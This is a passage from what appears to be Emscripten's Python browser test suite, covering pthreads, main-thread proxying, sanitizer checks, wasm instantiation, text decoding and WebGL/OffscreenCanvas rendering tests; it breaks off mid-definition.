self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd/io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
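# Sketch of the pthread_setspecific/pthread_getspecific usage being checked on the main thread
# (illustration only):
#
#   #include <pthread.h>
#   #include <assert.h>
#
#   int main(void) {
#     pthread_key_t key;
#     pthread_key_create(&key, 0 /* no destructor */);
#     pthread_setspecific(key, (void*)0x1234);
#     assert(pthread_getspecific(key) == (void*)0x1234);
#     pthread_key_delete(key);
#     return 0;
#   }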
@also_with_wasm2js
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'])
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test that Module.locateFile can be used to control where the pthread worker .js file is loaded from
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.set_setting('EXIT_RUNTIME')
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
_Atomic int result = 0;
void *thread_main(void *arg) {
result = 1;
pthread_exit(0);
}
int main() {
pthread_t t;
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
assert(result == 1);
return 0;
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY)
shutil.move('test.worker.js', Path('cdn/test.worker.js'))
if os.path.exists('test.html.mem'):
shutil.copyfile('test.html.mem', Path('cdn/test.html.mem'))
self.run_browser('test.html', '', '/report_result?exit:0')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY)
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?exit:0')
# Test that there is no deadlock when the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread).
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest_exit(test_file('pthread/call_async.c'), args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_futex_wake(addr, INT_MAX) wakes all waiters
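# Sketch of the wake-all pattern (illustration only), assuming the emscripten_futex_wait /
# emscripten_futex_wake helpers declared in <emscripten/threading.h>:
#
#   #include <emscripten/threading.h>
#   #include <limits.h>
#   #include <math.h>
#
#   volatile uint32_t futex_word = 0;
#
#   // Waiters: block while the word still holds the expected value.
#   //   emscripten_futex_wait(&futex_word, 0, /*maxWaitMs=*/INFINITY);
#   // Waker: change the word, then wake every waiter at once.
#   //   futex_word = 1;
#   //   emscripten_futex_wake(&futex_word, INT_MAX);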
@also_with_wasm2js
@requires_threads
def test_pthread_wake_all(self):
self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB'])
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_asan_use_after_free_2(self):
# similar to test_pthread_asan_use_after_free, but using a pool instead
# of proxy-to-pthread, and also the allocation happens on the pthread
# (which tests that it can use the offset converter to get the stack
# trace there)
self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_trap(self):
create_file('pre.js', '''
if (typeof window === 'object' && window) {
window.addEventListener('error', function(e) {
if (e.error && e.error.message.includes('unreachable'))
maybeReportResultToServer("expected exception caught");
else
maybeReportResultToServer("unexpected: " + e);
});
}''')
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'EXIT_RUNTIME',
'--profiling-funcs',
'--pre-js=pre.js']
self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
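# Sketch of a MAIN_THREAD_EM_ASM_INT call with arguments (illustration only); the call is proxied
# to the main thread and returns an int:
#
#   #include <emscripten.h>
#
#   int answer = MAIN_THREAD_EM_ASM_INT({ return $0 + $1; }, 40, 2);  // evaluates JS on the main thread, yields 42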
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html')))
self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler set via signal(SIGALRM, func);
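# Sketch of the alarm()/SIGALRM pattern under test (illustration only; the handler body is
# hypothetical):
#
#   #include <signal.h>
#   #include <unistd.h>
#
#   static void on_alarm(int sig) { /* mark that the signal arrived */ }
#
#   int main(void) {
#     signal(SIGALRM, on_alarm);
#     alarm(1);  // request SIGALRM delivery after roughly one second
#     /* ... keep running until the handler has been invoked ... */
#     return 0;
#   }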
def test_sigalrm(self):
self.btest_exit(test_file('test_sigalrm.c'), args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', Path('cdn/test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
@also_with_threads
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
@also_with_threads
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
@also_with_threads
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
# pthread TextDecoder support is more complex due to
# https://github.com/whatwg/encoding/issues/172
# and therefore the expected code size win there is actually a loss
if '-pthread' not in self.emcc_args:
self.assertLess(td_without_fallback, just_fallback)
else:
self.assertGreater(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5787), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has first been used to render WebGL content in a pthread
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
@disabled('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest_exit('gl_only_in_pthread.cpp', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this with Chrome as the browser,
# you may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this with Chrome as the browser,
# you may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# There is also a known bug with Mac Intel baseInstance that can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL']
self.btest_exit('webgl_sample_query.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest_exit('webgl_timer_query.cpp', args=cmd)
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest_exit('webgl_draw_triangle.c', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@parameterized({
'': ([False],),
'asyncify': ([True],),
})
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify):
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd)
@parameterized({
'proxy': (['-sPROXY_TO_PTHREAD'],),
'': ([],),
})
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self, args):
